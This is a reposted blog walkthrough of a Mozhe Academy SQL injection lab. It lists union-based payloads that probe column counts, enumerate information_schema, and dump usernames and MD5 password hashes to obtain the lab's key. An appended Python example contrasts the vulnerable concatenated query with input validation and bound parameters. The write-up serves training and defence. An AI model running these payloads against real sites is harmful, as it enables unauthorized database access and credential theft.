Mozhe Academy SQL Injection Walkthrough
2020-11-08 09:40:00 【osc_7bgz0no1】
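1. Determine whether injection exists
Requesting id=1 returns the page normally. Requesting id=-1 returns an error. From this we can tell that an injection point exists.
2. Determine the number of columns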
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
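URL id=-1 order by 5 returns an error at this point, which means there are four columns
3. Use union to find the injection points
Enter union select 1,2,3,4
Positions 2 and 3 turn out to be the ones displayed on the page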
4. Use database() to find the database name
Enter union select 1,database(),3,4
The database name is mozhe_Discuz_StormGroup
5. Find the table names
Enter
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
This returns StormGroup_member,notice
The first name contains "member", which makes that table the suspicious one, so query it first.
6. Find the columns stored in StormGroup_member
Enter
union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
This returns id,name,password,status
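7. Query the usernames and passwords
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
This returns MD5-hashed values. Recover the plaintext from the hash to get the password.
If the password is not correct, use limit m,n to continue querying the remaining rows.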
8. Submit the key
After obtaining the password, log in and the key is displayed; copy it and submit it.
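Steps 1 through 7 all depend on the id value being concatenated into the query text. The following added example (not part of the original post) contrasts that pattern with input validation plus a bound parameter, using the payloads from steps 2 and 3. SQLite stands in for the lab's database, and the notice table layout, the sample row and all function names are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the lab's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE notice (id INTEGER, title TEXT, content TEXT, ts TEXT)")
    db.execute("INSERT INTO notice VALUES (1, 'Maintenance', 'Planned downtime', '2020-11-08')")
    return db

def lookup_vulnerable(db, raw_id):
    # The request parameter is pasted into the SQL text, so everything after
    # the number is parsed as SQL (the pattern steps 1-7 depend on).
    return db.execute(
        "SELECT id, title, content, ts FROM notice WHERE id = " + raw_id
    ).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Accept only what the application expects: a short unsigned integer.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return None  # reject; the caller answers with a generic error page
    # 2) Bind the value so the driver never parses it as SQL.
    return db.execute(
        "SELECT id, title, content, ts FROM notice WHERE id = ?", (int(raw_id),)
    ).fetchall()

def run(lookup, raw_id):
    # Map database errors to a marker instead of echoing them to the client;
    # the ORDER BY probe in step 2 works because the error is visible.
    db = make_db()
    try:
        return lookup(db, raw_id)
    except sqlite3.Error:
        return "db-error"

if __name__ == "__main__":
    for raw in ["1", "-1 union select 1,2,3,4", "-1 order by 4", "-1 order by 5"]:
        print(repr(raw), run(lookup_vulnerable, raw), run(lookup_hardened, raw))
```

With the concatenated query the union payload comes back as a row and the order by 5 probe surfaces a database error; the hardened lookup rejects both before any SQL is executed.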
Copyright notice
This article was written by [osc_7bgz0no1]. Please include a link to the original when reposting. Thanks.
https://my.oschina.net/u/4415254/blog/4707940